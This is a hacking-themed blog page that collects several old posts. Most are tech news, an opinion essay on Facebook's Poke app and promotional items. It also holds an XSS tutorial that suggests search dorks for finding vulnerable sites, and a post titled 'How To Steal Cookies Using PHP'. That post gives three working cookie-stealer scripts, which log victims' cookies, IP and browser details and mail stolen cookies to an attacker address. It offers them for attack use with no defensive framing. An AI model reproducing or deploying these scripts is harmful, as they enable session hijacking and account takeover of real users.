CYBER SHAFT

Home » All posts

Webnoo SMS

Posted by Cyber Shaft Tuesday, June 11, 2013 1 comment

Hello every one this my another post after a long time this post has been written for make every one aware of the new SMS WEBSITE that is Webnoo SMS . This is a awsome website for SMS which contains SMS of all the categories so i wish you all to follow this blog for all kinds of SMSs so DO FOLLOW this website.

Cross Site Scripting(XSS)

Posted by Cyber Shaft Thursday, March 28, 2013 1 comment

What is XSS?

Cross Site Scripting also known as XSS , is one of the most common web appliction vulnerability that allows an attacker to run his own client side scripts(especially Javascript) into web pages viewed by other users.

In a typical XSS attack, a hacker inject his malicious javascipt code in the legitimate website . When a user visit the specially-crafted link , it will execute the malicious javascript. A successfully exploited XSS vulnerability will allow attackers to do phishing attacks, steal accounts and even worms.

Example :Let us imagine, a hacker has discovered XSS vulnerability in Gmail and inject malicious script. When a user visit the site, it will execute the malicious script. The malicious code can be used to redirect users to fake gmail page or capture cookies. Using this stolen cookies, he can login into your account and change password.

It will be easy to understand XSS , if you have the following prerequisite:

Strong Knowledge in HTML,javascript.
Basic Knowledge in HTTP client-Server Architecure
[optional]Basic Knowledge about server side programming(php,asp,jsp)

XSS Attack:
Step 1: Finding Vulnerable Website
Hackers use google dork for finding the vulnerable sites for instance "?search=" or ".php?q=" . 1337 target specific sites instead of using google search. If you are going to test your own site, you have to check every page in your site for the vulnerability.

Step 2: Testing the Vulnerability:
First of all, we have to find a input field so that we can inject our own script, for example: search box, username,password or any other input fields.

Test 1 :
Once we found the input field, let us try to put some string inside the field, for instance let me input "BTS". It will display the result .

Now right click on the page and select view source. search for the string "BTS" which we entered in the input field. Note the location where the input is placed.

Test 2:
Now we are going to check whether the server sanitize our input or not. In order to do this , let us input the <script> tag inside the input field.

View the source of the page . Find the location where input displayed place in previous test.

Thank god, our code is not being sanitized by the server and the code is just same as what we entered in the field. If the server sanitize our input, the code may look like this <script>. This indicates that the website vulnerable to XSS attack and we can execute our own scripts .

Step 3: Exploiting the vulnerability
Now we know the site is somewhat vulnerable to XSS attack. But let us make sure whether the site is completely vulnerable to this attack by injecting a full javascript code. For instance, let us input <script>alert('BTS')</script> .

Now it will display pop-up box with 'BTS' string. Finally, we successfully exploit the XSS . By extending the code with malicious script, a hacker can do steal cookies or deface the site and more.

Types of XSS Based on persisting capability:
Based one Persistence capability, we can categorize the XSS attack into two types namely Persistent and Non-Persistent.

Persistent XSS:

The Persistent or Stored XSS attack occurs when the malicious code submitted by attacker is saved by the server in the database, and then permanently it will be run in the normal page.

For Example:
Many websites host a support forum where registered users can ask their doubts by posting message , which are stored in the database. Let us imagine , An attacker post a message containing malicious javascript code instead. If the server fail to sanitize the input provided, it results in execution of injected script. The code will be executed whenever a user try to read the post. If suppose the injected code is cookie stealing code, then it will steal cookie of users who read the post. Using the cookie, attacker can take control of your account.

Non-Persistent XSS:

Non-Persistent XSS, also referred as Reflected XSS , is the most common type of XSS found now a days. In this type of attack, the injected code will be send to the server via HTTPrequest. The server embedd the input with the html file and return the file(HTTPResponse) to browser. When the browser executes the HTML file, it also execute the embedded script. This kind of XSS vulnerability frequently occur in search fields.

Example:
Let us consider a project hosting website. To find our favorite project, we will just input the related-word in the search box . When searching is finished, it will display a message like this "search results for yourword " . If the server fail to sanitize the input properly, it will results in execution of injected script.

In case of reflected XSS attacks, attacker will send the specially-crafted link to victims and trick them into click the link. When user click the link, the browser will send the injected code to server, the server reflects the attack back to the users' browser. The browser then executes the code .

In addition to these types, there is also third type of attack called DOM Based XSS attack, i will explain about this attack in later posts.

How To Steal Cookies Using PHP

Posted by Cyber Shaft 1 comment

Here is the simple Cookie Stealer code:
Cookie stored in File:

<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");
fclose($steal);
?>

$cookie = $HTTP_GET_VARS["cookie"]; steal the cookie from the current url(stealer.php?cookie=x)and store the cookies in $cookie variable.

$steal = fopen("cookiefile.txt", "a"); This open the cookiefile in append mode so that we can append the stolen cookie.

fwrite($steal, $cookie ."\\n"); This will store the stolen cookie inside the file.

fclose($steal); close the opened file.

Another version: Sends cookies to the hacker mail:

<?php
$cookie = $HTTP_GET_VARS["cookie"]; mail("hackerid@mailprovider.com", "Stolen Cookies", $cookie); ?>

The above code will mail the cookies to hacker mail using the PHP() mail function with subject "Stolen cookies".

Third Version:

<?php
function GetIP()
{
    if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
        $ip = getenv("HTTP_CLIENT_IP");
    else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
        $ip = getenv("HTTP_X_FORWARDED_FOR");
    else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
        $ip = getenv("REMOTE_ADDR");
    else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
        $ip = $_SERVER['REMOTE_ADDR'];
    else
        $ip = "unknown";
    return($ip);
}
function logData()
{
    $ipLog="log.txt";
    $cookie = $_SERVER['QUERY_STRING'];
    $register_globals = (bool) ini_get('register_gobals');
    if ($register_globals) $ip = getenv('REMOTE_ADDR');
    else $ip = GetIP();

    $rem_port = $_SERVER['REMOTE_PORT'];
    $user_agent = $_SERVER['HTTP_USER_AGENT'];
    $rqst_method = $_SERVER['METHOD'];
    $rem_host = $_SERVER['REMOTE_HOST'];
    $referer = $_SERVER['HTTP_REFERER'];
    $date=date ("l dS of F Y h:i:s A");
    $log=fopen("$ipLog", "a+");

    if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie <br>");
    else
        fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
    fclose($log);
}
logData();
?>

The above Cookie stealer will store the following information:

Ip address
port number
host(usually computer-name)
user agent
cookie

Mobile Phone Upgrades And Advantages

Posted by Cyber Shaft Tuesday, January 15, 2013 1 comment

Mobile phone Upgrades are the most common thing which can be done in the present generation with great ease. In the present generation there is a lot of competition going among all the network careers which are maintained by Smartphones like iPhone 4, 4S, 5, Samsung Galaxy S2, S3 and HTC.

As you know that there is competition between new gadgets and smart devices in the technical market and these innovations include Tablets, Laptops, Smartphones and many devices which are launched daily in the market. As you upgrade the operating systems in the mobile devices likewise, you need to upgrade mobile phones with the new careers, software’s and applications. There are some mobile phone upgrades which are good for your handset and will work better with them.

Check the Eligibility to Upgrade: As you know that it is a very essential thing to know, whether you are eligible for the upgrade of your handset. You also need to check as for sometimes you are in contract with the careers and make some agreements for long time periods and for the process of upgrade, you need to get released from that contract and you can qualify your mobile for upgrade.
Conversion of Service providers when upgrade: It is also the most important thing for you to check with the service providers. When you are planning for an upgrade, you also need to change the service providers and get qualified for new and amazing plans. If you think that your service provider is providing you with the best service and plans, you need to think before changing the provider. This change makes you avail the services of new providers and plans.
Get Advantage of Grace Period: If you are stable with the best service provider offering the best plans, you don’t need to upgrade your mobile or service provider. Lots of service providers provide the best services when you are planning to upgrade your contract terms. They will let you know before a month about the expiry of the contract and asks whether you want to continue the contract or to change to the other provider. If you change your provider without informing the present service providers, they can impose some penalties.
Get to the best deals: This is also an essential thing you need to know before you are upgrading your mobile or service providers. You can check about the best deals on the internet and get to the service providers with the best deals and low packages. You can also go to the service providers who are giving funds to mobile phone dealers to get the new customers and also provide the process of upgrades with new contracts.
Clear your words with Providers: Have a clear word with your existing service provider that you are preparing to upgrade your mobile and you should ask them whether they are providing you with the best offers and unique plans which are offered by the other operators and providers. You can also stay with your present provider if they provide you with the new plans, and offers and if not, you can upgrade your mobile with the new service provider.

About the Author:
This article has been posted by Maria, a professional blogger who is writing articles on PPI claims and shows keen interest in finance and mobile phones. You can reach her @finacneport

Pokey

Posted by Cyber Shaft Thursday, December 27, 2012 1 comment

It’s pretty ballsy to call your sexting app Poke. That was my first reaction to the news last week that Facebook had launched a clone of Snapchat, the trendy smartphone app that lets you send photos and videos that self-destruct after a few seconds. Like most people born before the 1990s, I’m not a Snapchat user, and I’ve long assumed the worst about the app—that combining cameras; young people; and secret, self-destructing messages could only mean trouble.

Yet TechCrunch’s Jordan Crook persuasively argues that Snapchat has gotten a bad rap. Rather than sexting, teenagers are more likely using the app to safely explore the sort of silly, unguarded, and sometimes unwise ideas that have always occupied the teenage brain. Give teens credit for wanting to communicate with their friends in a manner that won’t haunt them forever. In other words, they’re chatting with Snapchat precisely because it’s not like chatting with Facebook.

If you think about Snapchat this way—as an app that young people are using for much more than sexting—Facebook’s interest in it becomes obvious. Indeed, Snapchat should scare the bejeezus out of Facebook. Here’s a company that’s winning millions of young adherents to a mode of online communication that is utterly alien from Facebook’s public, permanent interactions. Mark Zuckerberg can’t afford to let that happen. In order to realize its hundred-billion-dollar dreams, Facebook needs to forever dominate all of the world’s social interactions. Wherever two or more people are communicating—whether it’s by text, video, pictures, or through games or gifts—Facebook needs to be a part of their conversation. It needs to be especially vigilant against usurpers of young people, the vanguard that decides who’ll rule tomorrow’s Internet.

Hence, Facebook had to make Poke. Facebook created the app in just 12 days, reportedly after Snapchat turned down Facebook’s attempts to acquire the firm. Poke is ridiculously similar to Snapchat, a feature-for-feature copy that would make Xerox blush. Imitation isn’t unusual for Facebook; as I argued last year, Facebook constantly “roams the tech universe in search of interesting technology, then mercilessly assimilates all the best stuff into its ever-larger catalog of features.” Over the last couple years it has copied the defining ideas behind Foursquare, Twitter, Google+, Groupon, GroupMe, Instagram, Quora — and now Snapchat.

You might fault Facebook for cloning other companies’ ideas, but I don’t think mimicry is so bad. All tech firms, from Apple to Microsoft to Google, get ahead through a mix of innovation and inspiration. The problem with Poke isn’t that Facebook had to copy Snapchat. The real problem—and it’s a big one—is that Facebook didn’t think of building something like Snapchat long ago, all by itself.

After all, the idea of conversations that leave no trace isn’t something Snapchat invented. It’s an age-old form of interaction, the stuff of spy novels and soap operas and classroom notes meant to be eaten after reading. The fact that it took someone else to invent an app for this kind of innately appealing chatter suggests that Facebook isn’t thinking expansively enough about its main product: people. Facebook’s success depends on its ability to predict how you, me, and everyone we know are going to want to behave online in the future. If it missed the inherent utility of something as simple as Snapchat, what other shifts in online behavior will Facebook never see coming?

To be sure, predicting human behavior is a tall order. We’re all fickle and prone to fads, and young people’s fervor for Snapchat could wane tomorrow. (See Chatroulette.) That’s precisely why Facebook likes to think of itself as a “platform,” not a product. Facebook keeps the “social graph” of all of our connections and it leaves it to other companies to build interesting products using that data. Snapchat’s very success shows that Facebook’s platform strategy is working quite well. The only reason that the app could acquire millions of users in a few months’ time is because Snapchat spread through each of its users’ Facebook friends. Instagram and Pinterest, the two other recent social-networking successes, also benefited tremendously from their users’ Facebook’s connections.

The trouble for Facebook is that when these Facebook-enabled apps get too big, they threaten the giant itself. Every photo that people were sharing through Instagram was a dagger at the heart of Facebook, the world’s largest photo site. That’s why Facebook attempted to copy Instagram—see its Camera app—and then had to buy it. Similarly, every message that you send to your Facebook friends through Snapchat is a lost opportunity for Facebook. That’s why Facebook had to squash it.

The fact that Facebook could build Poke in less than a couple weeks shows that it knows how to move quickly when it sees an opportunity. But Poke is already losing to Snapchat in the app standings. Like Facebook’s failed imitations of Instagram and Quora, Poke’s quick decline shows that if Facebook wants to stay on the vanguard of online communication, it needs to act even before it sees an opportunity—by the time somebody else has had success with something, Facebook’s version isn’t going to catch on.

How can Facebook do this? I think Zuckerberg ought to stand up a skunkworks team — a group of engineers, designers, and product managers whose sole mission is to create lots of small, interesting apps that offer new takes on online communication. (Or Facebook could buy Betaworks, the New York-based startup that already does this very well. In the last few years, that team has created Chartbeat, Bitly, and the new Digg, three sites that mine social and Web data to create novel experiences.) Facebook is never going to be able to anticipate all of the fads that hit the Web, nor should it make it its mission to do so. But such a team could at least try to come up with novel social networking ideas—because if Facebook doesn’t try, someone else will, and by the time Facebook recognizes the threat, it will be too late to do anything about it.

I don’t know if such a team would have created something like Snapchat. But considering how quickly it slapped Poke together, they very well could have. Facebook shouldn’t be ashamed that it had to copy Poke. But it should be ashamed that it never even tried to invent it.

Apple iPhone SmartWatch in 2013

Posted by Cyber Shaft 0 comments

Apple and Intel are working together to create a Bluetooth-equipped smartwatch in 2013, according to one Chinese technology news source.

Tech site TGbus says the watch would connect to the iPhone, allowing you to remotely operate the phone from your wrist. That means you could send out text messages, answer calls, or even update your Facebook status on the device while your iPhone is in a pocket or charging nearby.

An iPhone-compatible smartwatch is certainly in a high demand. Earlier this year a Kickstarter for the Pebble smartwatch raised over $10 million in funding from 70,000 people who want one of the watches, $500k of that funding raised during the company’s first day on Kickstarter’s website.

Pebble has yet to ship to customers, but the company is allowing customers who didn’t support the Kickstarter to pre-order the watch now for $150.

Another smartwatch, made by Martian, is expected to be available early next year. That watch is designed to look more like traditional watches, adding a small LED screen with users can see texts, as well as notifications from Facebook, Twitter, and Gmail.

The watch can also accept calls, and has Siri-integration.

Apple recently discontinued the square iPod nano, which many Apple fans have previously used to create their own Apple-branded smartwatches.

Would you buy an Apple-branded smartwatch, or any other brand? Let us know your thoughts in the comments.

Microsoft's WINDOWS PHONW 8 EVENTS

Posted by Cyber Shaft Monday, October 29, 2012 0 comments

Continuing with its blitzkrieg of all things Windows, Microsoft held an event for Windows Phone 8 in San Francisco today. Microsoft’s Joe Belfiore and Steve Ballmer – and, yes, Jessica Alba – announced new features and where people can get their hands on Windows Phone 8 devices this November.

Apps:

Apps by the numbers:

Belfiore announced that the Windows Store now has over 120,000 apps, and that “hundreds” more are added each day.
Apps are available in 50 languages and 191 countries.

Live Apps:

Belfiore demoed new Live Apps, which are a cross between the company’s signature (resizable!) Live Tiles and full applications that can integrate with the Wallet, the company’s payments solution, and other “hubs” (groups of apps or people).
Using the Live Apps framework, developers are able to build versions of the app that can appear on the lock screen. The example given was a Facebook-equipped lock screen that shows different Facebook photos each time the phone is unlocked.
“Think about how many times you take your phone out of your pocket, you turn it on, and you see your lock screen, and you’re seeing that same old image that you put on there months ago. Kinda boring.”
“The new lock screen is going to make that phone feel so much more personal, because each time you take it out, it’s going to feel that much more relevant to you.”

New Apps:

Belfiore announced a slew of new apps, Angry Birds “Roost,” PayPal, Twitter, The Weather Channel, Photosynth, Chase, CNN, Angry Birds Star Wars, Where’s My Water, and more.
Microsoft has also worked with Facebook to bring a new, Live Apps-capable version of the social networking app to Windows Phone 8 devices.
“We think that, with the launch of these apps, we will be at a point where we have 46 of the top 50 most heavily-used apps on other platforms on Windows Phone.”
Pandora will be shipping with Windows Phone 8 “early in 2013.” Microsoft has partnered with the company to provide Windows Phone 8 users with one year of ad-free music.

Skype:

The new Skype app is “always on,” meaning that it’s ready to receive a call or message at any time. Belfiore claims that the service is able to do this without draining the phone’s battery and constantly running in the background.

Data Sense:

With Data Sense, Microsoft has built a system in the cloud and on the phone client that compresses every Web page browsed. The process sounds similar to that used by Amazon’s Silk browser, which shipped with the Kindle Fire, and the Opera browser available on Mac, Windows, iOS, and Android.
The feature helps users find WiFi hotspots that they can use instead of relying on cellular data.
Belfiore says that Data Sense will automatically adjust the way that the device uses data when a user nears their monthly data limit.
Data Sense users, Belfiore says, were able to access 45 percent more Web pages with the same data limit as people that don’t have the feature.
Microsoft is working with carriers to deploy Data Sense, and the first company to support the feature is Verizon.

Kid’s Corner:

Kid’s Corner, in a nutshell, creates a separate “place” on your phone specifically for kids. Parents will be able to allow or block apps and games from appearing in Kid’s Corner, which is accessed via swiping to the left in the lock screen.
Belfiore brought Jessica Alba out to talk about how much she loves Kid’s Corner and Windows Phone 8 as a whole (and to plug The Honest Company’s upcoming app).

Rooms:

Rooms is a new feature that allows users to group and interact with certain people on their phone more easily. Windows Phone 8 will ship with a pre-installed “Family” room, but Belfiore says that users can create and define their own rooms as well.
Through Rooms, users can share notes and calendars with each other – Belfiore specifically cited a running grocery list that he and his wife use to stay on top of what they need to buy.
Rooms work across platforms; an iPhone user that is added to a Room can enjoy similar features to users on Windows Phone 8.

Ecosystem:

“This year, Windows, from the PC to the tablet and the phone and the Xbox, will not only look and feel the same way, but will also work together in concert in a lot of compelling ways.”
With Windows Phone 8, you can move your documents, photos, and music across all your devices wherever you are, Belfiore says, and the “key player” to all of that is SkyDrive.
Belfiore took a dig at Apple’s iCloud, saying that its SkyDrive service “isn’t just for photos and video – it’s the first cloud service that fully integrates and syncs your Office documents.”
Next up came Lenses, Microsoft’s kinda-sorta Answer to Instagram. Share on Facebook, Twitter, on email, NFC. In the background, a full-resolution version of the photo is uploaded to SkyDrive.
SkyDrive gets you started with the most free storage of any service, with 7GB and “gives you complete control over your photo content,” Belfiore says. He compared this to iCloud and Photo Stream, which will only store up to 1,000 photos for 30 days or less.

On being late, and hardware:

Microsoft CEO Steve Ballmer took the stage to explain why the company might be a bit late to the smartphone wars, saying: “We had a very different perspective on what a smartphone can be. We didn’t want to build just a single phone for all of us. We wanted to build a phone that could be unique for each of us.”
Windows Phone 8 devices will go on sale this weekend.
Verizon will sell the Windows Phone 8X and the Lumia 822 by Thanksgiving, and it will sell Samsung’s Ativ Odyssey exclusively some time in November.
T-Mobile will be selling Nokia’s Lumia 810 and the Windows Phone 8X.
AT&T has the exclusive on the new Lumia 920 and Lumia 820 devices from Nokia, and will also be selling HTC’s Windows Phone 8X.
Microsoft will be selling every Windows Phone 8 device in its 65 Microsoft Stores across the country.